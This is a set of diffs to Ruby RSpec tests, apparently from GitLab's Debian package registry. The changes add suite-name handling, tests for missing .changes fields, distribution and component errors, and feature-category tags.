require 'spec_helper'
RSpec.describe Packages::Debian::ProcessChangesService do
RSpec.describe Packages::Debian::ProcessChangesService, feature_category: :package_registry do
describe '#execute' do
let_it_be(:user) { create(:user) }
let_it_be_with_reload(:distribution) { create(:debian_project_distribution, :with_file, codename: 'unstable') }
let_it_be_with_reload(:distribution) { create(:debian_project_distribution, :with_file, suite: 'unstable') }
let!(:incoming) { create(:debian_incoming, project: distribution.project) }
let(:package_file) { incoming.package_files.last }
let(:package_file) { incoming.package_files.with_file_name('sample_1.2.3~alpha2_amd64.changes').first }
subject { described_class.new(package_file, user) }
@ -27,11 +27,37 @@ RSpec.describe Packages::Debian::ProcessChangesService do
expect(created_package.creator).to eq user
end
context 'with existing package' do
let_it_be_with_reload(:existing_package) { create(:debian_package, name: 'sample', version: '1.2.3~alpha2', project: distribution.project) }
context 'with non-matching distribution' do
before do
existing_package.update!(debian_distribution: distribution)
distribution.update! suite: FFaker::Lorem.word
end
it { expect { subject.execute }.to raise_error(ActiveRecord::RecordNotFound) }
end
context 'with missing field in .changes file' do
shared_examples 'raises error with missing field' do |missing_field|
before do
allow_next_instance_of(::Packages::Debian::ExtractChangesMetadataService) do |extract_changes_metadata_service|
expect(extract_changes_metadata_service).to receive(:execute).once.and_wrap_original do |m, *args|
metadata = m.call(*args)
metadata[:fields].delete(missing_field)
metadata
end
end
end
it { expect { subject.execute }.to raise_error(ArgumentError, "missing #{missing_field} field") }
end
it_behaves_like 'raises error with missing field', 'Source'
it_behaves_like 'raises error with missing field', 'Version'
it_behaves_like 'raises error with missing field', 'Distribution'
end
context 'with existing package' do
let_it_be_with_reload(:existing_package) do
create(:debian_package, name: 'sample', version: '1.2.3~alpha2', project: distribution.project, published_in: distribution)
end
it 'does not create a package and assigns the package_file to the existing package' do

View File

@ -3,10 +3,11 @@ require 'spec_helper'
RSpec.describe Packages::Debian::ProcessPackageFileService, feature_category: :package_registry do
describe '#execute' do
let_it_be_with_reload(:distribution) { create(:debian_project_distribution, :with_file, codename: 'unstable') }
let_it_be_with_reload(:distribution) { create(:debian_project_distribution, :with_suite, :with_file) }
let!(:package) { create(:debian_package, :processing, project: distribution.project, published_in: nil) }
let(:distribution_name) { distribution.codename }
let(:component_name) { 'main' }
let(:debian_file_metadatum) { package_file.debian_file_metadatum }
subject { described_class.new(package_file, distribution_name, component_name) }
@ -42,6 +43,12 @@ RSpec.describe Packages::Debian::ProcessPackageFileService, feature_category: :p
context 'when there is no matching published package' do
it_behaves_like 'updates package and package file'
context 'with suite as distribution name' do
let(:distribution_name) { distribution.suite }
it_behaves_like 'updates package and package file'
end
end
context 'when there is a matching published package' do
@ -109,6 +116,34 @@ RSpec.describe Packages::Debian::ProcessPackageFileService, feature_category: :p
end
end
context 'without distribution name' do
let!(:package_file) { create(:debian_package_file, without_loaded_metadatum: true) }
let(:distribution_name) { '' }
it 'raise ArgumentError', :aggregate_failures do
expect(::Packages::Debian::GenerateDistributionWorker).not_to receive(:perform_async)
expect { subject.execute }
.to not_change(Packages::Package, :count)
.and not_change(Packages::PackageFile, :count)
.and not_change(package.package_files, :count)
.and raise_error(ArgumentError, 'missing distribution name')
end
end
context 'without component name' do
let!(:package_file) { create(:debian_package_file, without_loaded_metadatum: true) }
let(:component_name) { '' }
it 'raise ArgumentError', :aggregate_failures do
expect(::Packages::Debian::GenerateDistributionWorker).not_to receive(:perform_async)
expect { subject.execute }
.to not_change(Packages::Package, :count)
.and not_change(Packages::PackageFile, :count)
.and not_change(package.package_files, :count)
.and raise_error(ArgumentError, 'missing component name')
end
end
context 'with package file without Debian metadata' do
let!(:package_file) { create(:debian_package_file, without_loaded_metadatum: true) }
let(:component_name) { 'main' }

View File

@ -2,7 +2,7 @@
require 'spec_helper'
RSpec.describe Packages::Debian::SignDistributionService do
RSpec.describe Packages::Debian::SignDistributionService, feature_category: :package_registry do
let_it_be(:group) { create(:group, :public) }
let(:content) { FFaker::Lorem.paragraph }

View File

@ -2,7 +2,7 @@
require 'spec_helper'
RSpec.describe Packages::Debian::UpdateDistributionService do
RSpec.describe Packages::Debian::UpdateDistributionService, feature_category: :package_registry do
RSpec.shared_examples 'Update Debian Distribution' do |expected_message, expected_components, expected_architectures, component_file_delta = 0|
it 'returns ServiceResponse', :aggregate_failures do
expect(distribution).to receive(:update).with(simple_params).and_call_original if expected_message.nil?

View File

@ -428,7 +428,6 @@
- './ee/spec/features/projects/merge_requests/user_edits_merge_request_spec.rb'
- './ee/spec/features/projects/milestones/milestone_spec.rb'
- './ee/spec/features/projects/mirror_spec.rb'
- './ee/spec/features/projects/navbar_spec.rb'
- './ee/spec/features/projects/new_project_from_template_spec.rb'
- './ee/spec/features/projects/new_project_spec.rb'
- './ee/spec/features/projects/path_locks_spec.rb'
@ -6124,7 +6123,6 @@
- './spec/lib/gitlab/ci/status/success_warning_spec.rb'
- './spec/lib/gitlab/ci/status/waiting_for_resource_spec.rb'
- './spec/lib/gitlab/ci/tags/bulk_insert_spec.rb'
- './spec/lib/gitlab/ci/templates/5_minute_production_app_ci_yaml_spec.rb'
- './spec/lib/gitlab/ci/templates/auto_devops_gitlab_ci_yaml_spec.rb'
- './spec/lib/gitlab/ci/templates/AWS/deploy_ecs_gitlab_ci_yaml_spec.rb'
- './spec/lib/gitlab/ci/templates/flutter_gitlab_ci_yaml_spec.rb'
@ -7470,7 +7468,6 @@
- './spec/lib/sidebars/menu_spec.rb'
- './spec/lib/sidebars/panel_spec.rb'
- './spec/lib/sidebars/projects/context_spec.rb'
- './spec/lib/sidebars/projects/menus/analytics_menu_spec.rb'
- './spec/lib/sidebars/projects/menus/ci_cd_menu_spec.rb'
- './spec/lib/sidebars/projects/menus/confluence_menu_spec.rb'
- './spec/lib/sidebars/projects/menus/deployments_menu_spec.rb'

View File

@ -3,7 +3,7 @@
require 'spec_helper'
RSpec.shared_examples 'Debian Distributions Finder' do |factory, can_freeze|
let_it_be(:distribution_with_suite, freeze: can_freeze) { create(factory, suite: 'mysuite') }
let_it_be(:distribution_with_suite, freeze: can_freeze) { create(factory, :with_suite) }
let_it_be(:container) { distribution_with_suite.container }
let_it_be(:distribution_with_same_container, freeze: can_freeze) { create(factory, container: container ) }
let_it_be(:distribution_with_same_codename, freeze: can_freeze) { create(factory, codename: distribution_with_suite.codename ) }
@ -35,7 +35,7 @@ RSpec.shared_examples 'Debian Distributions Finder' do |factory, can_freeze|
context 'by suite' do
context 'with existing suite' do
let(:params) { { suite: 'mysuite' } }
let(:params) { { suite: distribution_with_suite.suite } }
it 'finds distribution by suite' do
is_expected.to contain_exactly(distribution_with_suite)
@ -61,7 +61,7 @@ RSpec.shared_examples 'Debian Distributions Finder' do |factory, can_freeze|
end
context 'with existing suite' do
let(:params) { { codename_or_suite: 'mysuite' } }
let(:params) { { codename_or_suite: distribution_with_suite.suite } }
it 'finds distribution by suite' do
is_expected.to contain_exactly(distribution_with_suite)

View File

@ -3,7 +3,7 @@
require 'spec_helper'
RSpec.shared_examples 'Debian Distribution' do |factory, container, can_freeze|
let_it_be(:distribution_with_suite, freeze: can_freeze) { create(factory, suite: 'mysuite') }
let_it_be(:distribution_with_suite, freeze: can_freeze) { create(factory, :with_suite) }
let_it_be(:distribution_with_same_container, freeze: can_freeze) { create(factory, container: distribution_with_suite.container ) }
let_it_be(:distribution_with_same_codename, freeze: can_freeze) { create(factory, codename: distribution_with_suite.codename ) }
let_it_be(:distribution_with_same_suite, freeze: can_freeze) { create(factory, suite: distribution_with_suite.suite ) }

View File

@ -76,9 +76,9 @@ RSpec.shared_examples 'Generate Debian Distribution and component files' do
.and change { component_file1.reload.updated_at }.to(current_time.round)
package_files = package.package_files.order(id: :asc).preload_debian_file_metadata.to_a
pool_prefix = 'pool/unstable'
pool_prefix = "pool/#{distribution.codename}"
pool_prefix += "/#{project.id}" if container_type == :group
pool_prefix += "/p/#{package.name}/#{package.version}"
pool_prefix += "/#{package.name[0]}/#{package.name}/#{package.version}"
expected_main_amd64_content = <<~EOF
Package: libsample0
Source: #{package.name}
@ -183,7 +183,7 @@ RSpec.shared_examples 'Generate Debian Distribution and component files' do
main_sources_sha256 = Digest::SHA256.hexdigest(expected_main_sources_content)
expected_release_content = <<~EOF
Codename: unstable
Codename: #{distribution.codename}
Date: Sat, 25 Jan 2020 15:17:18 +0000
Valid-Until: Mon, 27 Jan 2020 15:17:18 +0000
Acquire-By-Hash: yes
@ -205,6 +205,7 @@ RSpec.shared_examples 'Generate Debian Distribution and component files' do
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 0 main/debian-installer/binary-arm64/Packages
#{main_sources_sha256} #{main_sources_size} main/source/Sources
EOF
expected_release_content = "Suite: #{distribution.suite}\n#{expected_release_content}" if distribution.suite
check_release_files(expected_release_content)
end
@ -228,12 +229,13 @@ RSpec.shared_examples 'Generate Debian Distribution and component files' do
.and not_change { distribution.component_files.reset.count }
expected_release_content = <<~EOF
Codename: unstable
Codename: #{distribution.codename}
Date: Sat, 25 Jan 2020 15:17:18 +0000
Valid-Until: Mon, 27 Jan 2020 15:17:18 +0000
Acquire-By-Hash: yes
SHA256:
EOF
expected_release_content = "Suite: #{distribution.suite}\n#{expected_release_content}" if distribution.suite
check_release_files(expected_release_content)
end

View File

@ -2,8 +2,7 @@
require 'spec_helper'
RSpec.describe Packages::Debian::GenerateDistributionWorker, type: :worker,
feature_category: :package_registry do
RSpec.describe Packages::Debian::GenerateDistributionWorker, type: :worker, feature_category: :package_registry do
describe '#perform' do
let(:container_type) { distribution.container_type }
let(:distribution_id) { distribution.id }

View File

@ -2,12 +2,14 @@
require 'spec_helper'
RSpec.describe Packages::Debian::ProcessChangesWorker, type: :worker do
RSpec.describe Packages::Debian::ProcessChangesWorker, type: :worker, feature_category: :package_registry do
let_it_be(:user) { create(:user) }
let_it_be_with_reload(:distribution) { create(:debian_project_distribution, :with_file, codename: 'unstable') }
let_it_be_with_reload(:distribution) do
create(:debian_project_distribution, :with_file, codename: FFaker::Lorem.word, suite: 'unstable')
end
let(:incoming) { create(:debian_incoming, project: distribution.project) }
let(:package_file) { incoming.package_files.last }
let(:package_file) { incoming.package_files.with_file_name('sample_1.2.3~alpha2_amd64.changes').first }
let(:worker) { described_class.new }
describe '#perform' do

View File

@ -3,7 +3,7 @@
require 'spec_helper'
RSpec.describe Packages::Debian::ProcessPackageFileWorker, type: :worker, feature_category: :package_registry do
let_it_be_with_reload(:distribution) { create(:debian_project_distribution, :with_file, codename: 'unstable') }
let_it_be_with_reload(:distribution) { create(:debian_project_distribution, :with_file) }
let_it_be_with_reload(:package) do
create(:debian_package, :processing, project: distribution.project, published_in: nil)
end